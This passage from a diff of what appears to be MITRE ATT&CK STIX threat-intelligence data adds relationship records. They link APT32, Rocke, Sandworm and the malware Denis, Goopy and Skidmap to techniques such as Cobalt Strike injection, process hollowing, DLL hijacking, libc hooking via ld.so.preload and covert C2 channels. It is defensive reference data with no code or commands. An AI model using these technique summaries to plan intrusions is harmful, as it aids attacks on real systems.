+ "source_ref": "intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e",
+ "target_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) malware has injected a Cobalt Strike beacon into Rundll32.exe.(Citation: Cybereason Cobalt Kitty 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--36af6d80-fef4-40b9-9b32-a2947eadd9e7",
+ "type": "relationship",
+ "modified": "2020-06-19T20:04:12.179Z",
+ "created": "2020-06-19T20:04:12.179Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e",
+ "target_ref": "attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) has lured targets to download a Cobalt Strike beacon by including a malicious link within spearphishing emails.(Citation: Cybereason Cobalt Kitty 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--788a6ca2-60ac-4f36-b708-c3a57f087b2b",
+ "type": "relationship",
+ "modified": "2020-06-19T20:04:12.189Z",
+ "created": "2020-06-19T20:04:12.189Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e",
+ "target_ref": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) has disguised a Cobalt Strike beacon as a Flash Installer.(Citation: Cybereason Cobalt Kitty 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--0d7c99f4-b1af-4278-b8bf-3bb04cce166d",
+ "type": "relationship",
+ "modified": "2020-06-19T20:04:12.191Z",
+ "created": "2020-06-19T20:04:12.191Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f25aab1a-0cef-4910-a85d-bb38b32ea41a",
+ "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[Denis](https://attack.mitre.org/software/S0354) used the IsDebuggerPresent, OutputDebugString, and SetLastError APIs to avoid debugging. [Denis](https://attack.mitre.org/software/S0354) used GetProcAddress and LoadLibrary to dynamically resolve APIs. [Denis](https://attack.mitre.org/software/S0354) also used the Wow64SetThreadContext API as part of a process hollowing process.(Citation: Cybereason Cobalt Kitty 2017)\t",
+ "relationship_type": "uses",
+ "id": "relationship--a51caaf6-3b9d-4953-9850-bf9217877644",
+ "type": "relationship",
+ "modified": "2020-06-26T14:33:49.436Z",
+ "created": "2020-06-19T20:39:21.788Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f25aab1a-0cef-4910-a85d-bb38b32ea41a",
+ "target_ref": "attack-pattern--29be378d-262d-4e99-b00d-852d573628e6",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[Denis](https://attack.mitre.org/software/S0354) ran multiple system checks, looking for processor and register characteristics, to evade emulation and analysis.(Citation: Cybereason Cobalt Kitty 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--081e43bc-3f9e-4110-a1c1-db7396e2ff59",
+ "type": "relationship",
+ "modified": "2020-06-26T14:33:49.440Z",
+ "created": "2020-06-19T20:39:21.802Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f25aab1a-0cef-4910-a85d-bb38b32ea41a",
+ "target_ref": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[Denis](https://attack.mitre.org/software/S0354) replaces the nonexistent Windows DLL \"msfte.dll\" with its own malicious version, which is loaded by the SearchIndexer.exe and SearchProtocolHost.exe.(Citation: Cybereason Cobalt Kitty 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--70ed2026-90af-4236-8180-2c095bbce0fe",
+ "type": "relationship",
+ "modified": "2020-06-19T20:39:21.805Z",
+ "created": "2020-06-19T20:39:21.805Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--f25aab1a-0cef-4910-a85d-bb38b32ea41a",
+ "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[Denis](https://attack.mitre.org/software/S0354) has a version written in PowerShell.(Citation: Cybereason Cobalt Kitty 2017)\t",
+ "relationship_type": "uses",
+ "id": "relationship--ad825dd4-a26c-4468-8c11-91124ef9042d",
+ "type": "relationship",
+ "modified": "2020-06-19T20:39:21.857Z",
+ "created": "2020-06-19T20:39:21.857Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b",
+ "external_references": [
+ {
+ "source_name": "Anomali Rocke March 2019",
+ "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang",
+ "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) has modified /etc/ld.so.preload to hook libc functions in order to hide the installed dropper and mining software in process lists.(Citation: Anomali Rocke March 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--2107aab0-0191-46d1-abec-8d98ac916c21",
+ "type": "relationship",
+ "modified": "2020-06-19T20:41:21.297Z",
+ "created": "2020-06-19T20:41:21.297Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--eac3d77f-2b7b-4599-ba74-948dc16633ad",
+ "target_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[Goopy](https://attack.mitre.org/software/S0477) has the ability to exfiltrate documents from infected systems.(Citation: Cybereason Cobalt Kitty 2017)\t",
+ "relationship_type": "uses",
+ "id": "relationship--bd2312fb-51ff-4766-a24f-1f5911457bc6",
+ "type": "relationship",
+ "modified": "2020-06-29T21:37:55.865Z",
+ "created": "2020-06-19T21:25:43.583Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--eac3d77f-2b7b-4599-ba74-948dc16633ad",
+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[Goopy](https://attack.mitre.org/software/S0477) has the ability to use cmd.exe to execute commands passed from an Outlook C2 channel.(Citation: Cybereason Cobalt Kitty 2017)\t",
+ "relationship_type": "uses",
+ "id": "relationship--7d1e24d5-1405-4ade-a4f3-ddb946b46783",
+ "type": "relationship",
+ "modified": "2020-06-29T21:37:55.900Z",
+ "created": "2020-06-19T21:25:43.591Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--eac3d77f-2b7b-4599-ba74-948dc16633ad",
+ "target_ref": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[Goopy](https://attack.mitre.org/software/S0477) has the ability to delete emails used for C2 once the content has been copied.(Citation: Cybereason Cobalt Kitty 2017)\t",
+ "relationship_type": "uses",
+ "id": "relationship--33e32e0a-571a-4eab-9ee4-dfe5747c3a72",
+ "type": "relationship",
+ "modified": "2020-06-29T21:37:55.910Z",
+ "created": "2020-06-19T21:25:43.593Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--eac3d77f-2b7b-4599-ba74-948dc16633ad",
+ "target_ref": "attack-pattern--54b4c251-1f0e-4eba-ba6b-dbc7a6f6f06b",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[Goopy](https://attack.mitre.org/software/S0477) has the ability to use a Microsoft Outlook backdoor macro to communicate with its C2.(Citation: Cybereason Cobalt Kitty 2017)\t",
+ "relationship_type": "uses",
+ "id": "relationship--c81124ac-5df7-4443-9760-95208d19e599",
+ "type": "relationship",
+ "modified": "2020-06-29T21:37:55.943Z",
+ "created": "2020-06-19T21:25:43.656Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--eac3d77f-2b7b-4599-ba74-948dc16633ad",
+ "target_ref": "attack-pattern--5bfccc3f-2326-4112-86cc-c1ece9d8a2b5",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[Goopy](https://attack.mitre.org/software/S0477) has had null characters padded in its malicious DLL payload.(Citation: Cybereason Cobalt Kitty 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--fb5fc8e3-2dd8-49de-bd9a-ee19c2f7ef7f",
+ "type": "relationship",
+ "modified": "2020-06-29T21:37:55.942Z",
+ "created": "2020-06-19T21:25:43.661Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--eac3d77f-2b7b-4599-ba74-948dc16633ad",
+ "target_ref": "attack-pattern--e64c62cf-9cd7-4a14-94ec-cdaac43ab44b",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[Goopy](https://attack.mitre.org/software/S0477) has the ability to side-load malicious DLLs with legitimate applications from Kaspersky, Microsoft, and Google.(Citation: Cybereason Cobalt Kitty 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--cbf9284f-2f47-4d1f-b708-861b0e1e85b5",
+ "type": "relationship",
+ "modified": "2020-06-29T21:37:55.984Z",
+ "created": "2020-06-19T21:25:43.678Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--eac3d77f-2b7b-4599-ba74-948dc16633ad",
+ "target_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[Goopy](https://attack.mitre.org/software/S0477) has the ability to maintain persistence by creating scheduled tasks set to run every hour.(Citation: Cybereason Cobalt Kitty 2017)\t",
+ "relationship_type": "uses",
+ "id": "relationship--f230afd5-2186-4d97-94ce-5ce3face8bc6",
+ "type": "relationship",
+ "modified": "2020-06-29T21:37:55.983Z",
+ "created": "2020-06-19T21:25:43.680Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--eac3d77f-2b7b-4599-ba74-948dc16633ad",
+ "target_ref": "attack-pattern--1996eef1-ced3-4d7f-bf94-33298cabbf72",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[Goopy](https://attack.mitre.org/software/S0477) has the ability to communicate with its C2 over DNS.(Citation: Cybereason Cobalt Kitty 2017)\t",
+ "relationship_type": "uses",
+ "id": "relationship--00aa618f-bcfa-4649-8436-134f9d01e43c",
+ "type": "relationship",
+ "modified": "2020-06-29T21:37:55.941Z",
+ "created": "2020-06-19T21:25:43.683Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--eac3d77f-2b7b-4599-ba74-948dc16633ad",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[Goopy](https://attack.mitre.org/software/S0477) has the ability to communicate with its C2 over HTTP.(Citation: Cybereason Cobalt Kitty 2017)\t",
+ "relationship_type": "uses",
+ "id": "relationship--8e17260d-d028-4d6b-9a45-4e767ecb88c3",
+ "type": "relationship",
+ "modified": "2020-06-29T21:37:55.939Z",
+ "created": "2020-06-19T21:25:43.686Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e",
+ "target_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) has abused the PasswordChangeNotify to monitor for and capture account password changes.(Citation: Cybereason Cobalt Kitty 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--dc8bedf8-c6fe-4b99-bde0-db676ba35a91",
+ "type": "relationship",
+ "modified": "2020-06-19T21:36:31.630Z",
+ "created": "2020-06-19T21:36:31.630Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e",
+ "target_ref": "malware--eac3d77f-2b7b-4599-ba74-948dc16633ad",
+ "external_references": [
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
+ }
+ ],
+ "description": "(Citation: Cybereason Cobalt Kitty 2017)",
+ "relationship_type": "uses",
+ "id": "relationship--f7ea9daf-5233-48b3-918f-9cea402b708f",
+ "type": "relationship",
+ "modified": "2020-06-19T21:38:45.615Z",
+ "created": "2020-06-19T21:38:45.615Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b68b5ea-2e1b-4225-845b-8632f702b9a0",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Skidmap",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/",
+ "description": "Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Retrieved June 4, 2020."
+ }
+ ],
+ "description": "[Skidmap](https://attack.mitre.org/software/S0468) has checked for the existence of specific files including /usr/sbin/setenforce and /etc/selinux/config. It also has the ability to monitor the cryptocurrency miner file and process. (Citation: Trend Micro Skidmap) ",
+ "relationship_type": "uses",
+ "id": "relationship--472c61e4-e839-4766-b1ce-d9095203e538",
+ "type": "relationship",
+ "modified": "2020-06-25T13:32:00.765Z",
+ "created": "2020-06-22T14:58:06.557Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b68b5ea-2e1b-4225-845b-8632f702b9a0",
+ "target_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Skidmap",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/",
+ "description": "Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Retrieved June 4, 2020."
+ }
+ ],
+ "description": "[Skidmap](https://attack.mitre.org/software/S0468) has the ability to check if /usr/sbin/setenforce exists. This file controls what mode SELinux is in.(Citation: Trend Micro Skidmap) ",
+ "relationship_type": "uses",
+ "id": "relationship--49f761f9-89d2-4e6f-a0c6-fc5e32cca471",
+ "type": "relationship",
+ "modified": "2020-06-25T13:32:00.168Z",
+ "created": "2020-06-22T14:58:06.560Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b68b5ea-2e1b-4225-845b-8632f702b9a0",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Skidmap",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/",
+ "description": "Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Retrieved June 4, 2020."
+ }
+ ],
+ "description": "[Skidmap](https://attack.mitre.org/software/S0468) has encrypted it's main payload using 3DES.(Citation: Trend Micro Skidmap) ",
+ "relationship_type": "uses",
+ "id": "relationship--2329d963-f01b-46bd-8868-99cf436a508a",
+ "type": "relationship",
+ "modified": "2020-06-25T13:32:00.768Z",
+ "created": "2020-06-22T14:58:06.594Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b68b5ea-2e1b-4225-845b-8632f702b9a0",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Skidmap",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/",
+ "description": "Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Retrieved June 4, 2020."
+ }
+ ],
+ "description": "[Skidmap](https://attack.mitre.org/software/S0468) has monitored critical processes to ensure resiliency.(Citation: Trend Micro Skidmap) ",
+ "relationship_type": "uses",
+ "id": "relationship--8ca0a20d-2c12-4b68-a2a9-ebd95c05ee68",
+ "type": "relationship",
+ "modified": "2020-06-25T13:32:00.796Z",
+ "created": "2020-06-22T14:58:06.599Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b68b5ea-2e1b-4225-845b-8632f702b9a0",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Skidmap",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/",
+ "description": "Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Retrieved June 4, 2020."
+ }
+ ],
+ "description": "[Skidmap](https://attack.mitre.org/software/S0468) has the ability to download, unpack, and decrypt tar.gz files .(Citation: Trend Micro Skidmap) ",
+ "relationship_type": "uses",
+ "id": "relationship--952412b3-a7b1-402c-a92e-96830df4d14b",
+ "type": "relationship",
+ "modified": "2020-06-25T13:32:00.205Z",
+ "created": "2020-06-22T14:58:06.602Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b68b5ea-2e1b-4225-845b-8632f702b9a0",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "Trend Micro Skidmap",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/",
+ "description": "Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Retrieved June 4, 2020."
+ }
+ ],
+ "description": "[Skidmap](https://attack.mitre.org/software/S0468) has the ability to download files on an infected host.(Citation: Trend Micro Skidmap) ",
+ "relationship_type": "uses",
+ "id": "relationship--1eb0fe9c-86e9-4c8c-8a24-c7b139559971",
+ "type": "relationship",
+ "modified": "2020-06-25T13:32:00.200Z",
+ "created": "2020-06-22T14:58:06.604Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192",
+ "target_ref": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735",
+ "external_references": [
+ {
+ "source_name": "ESET Telebots Dec 2016",
+ "url": "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
+ "description": "Cherepanov, A.. (2016, December 13). The rise of TeleBots: Analyzing disruptive KillDisk attacks. Retrieved June 10, 2020."
+ }
+ ],
+ "description": "[Sandworm Team](https://attack.mitre.org/groups/G0034) has used a tool to query Active Directory using LDAP, discovering information about computers listed in AD.(Citation: ESET Telebots Dec 2016)",
+ "relationship_type": "uses",
+ "id": "relationship--42d2f7f0-9548-4bdd-9e88-7200a9e91b57",
+ "type": "relationship",
+ "modified": "2020-06-22T15:45:19.036Z",
+ "created": "2020-06-22T15:45:19.036Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
+ "target_ref": "attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53",
+ "external_references": [
+ {
+ "source_name": "ESET Gamaredon June 2020",
+ "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/",
+ "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020."
+ }
+ ],
